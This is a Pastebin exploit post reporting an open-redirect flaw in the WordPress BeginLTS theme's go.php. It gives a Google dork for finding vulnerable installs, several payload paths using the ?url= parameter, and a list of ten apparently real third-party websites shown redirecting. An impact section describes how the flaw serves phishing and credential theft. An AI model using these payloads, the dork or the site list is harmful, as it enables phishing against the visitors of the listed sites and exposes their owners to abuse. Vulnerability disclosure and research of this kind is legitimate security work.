Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : WordPress BeginLTS Themes Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/03/2019
- # Vendor Homepage : wordpress.org
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/wp-content/themes/beginlts/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Impact :
- ***********
- This web application WordPress BeginLTS Themes accepts a user-controlled input that specifies a link to an external site,
- and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and
- could cause the web application to redirect the request to the specified URL. By modifying the URL value to a
- malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name
- in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often
- encounter redirection when they visit the Web site of a company whose name has been changed or which has been
- acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of
- which is to deceive the valid actor and steal his personal data.
- ############################################################################################
- # Vulnerable File : go.php
- ***************
- # Vulnerable Parameter : ?url=
- *********************
- # Open Redirection Exploit :
- **************************
- /wp-content/themes/beginlts/inc/go.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wp-content/themes/begin_lts/inc/go.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wp-content/themes/BeginLTS/inc/go.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /wp-content/themes/Beginlts/inc/go.php?url=https://www.[REDIRECTION-ADDRESS].gov
- ############################################################################################
- # Example Vulnerable Sites : [ Proof ]
- *********************************
- [+] tianzizhai.com/wp-content/themes/beginlts/inc/go.php?url=https://cxsecurity.com/ => archive.is/05V2e
- [+] kb-iot.com/wp-content/themes/begin_lts/inc/go.php?url=https://cxsecurity.com/ => archive.is/bPhdw
- [+] diyzn.cc/wp-content/themes/beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] kttg.pro/wp-content/themes/beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] feiyang.info/wp-content/themes/Beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] tuiusuoxue.com/wp-content/themes/Beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] hoards.com.cn/wp-content/themes/beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] zhujisenlin.com/wp-content/themes/BeginLTS/inc/go.php?url=https://cxsecurity.com/
- [+] chuangke.team/wp-content/themes/Beginlts/inc/go.php?url=https://cxsecurity.com/
- [+] maogw.com/wp-content/themes/Beginlts/inc/go.php?url=https://cxsecurity.com/
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement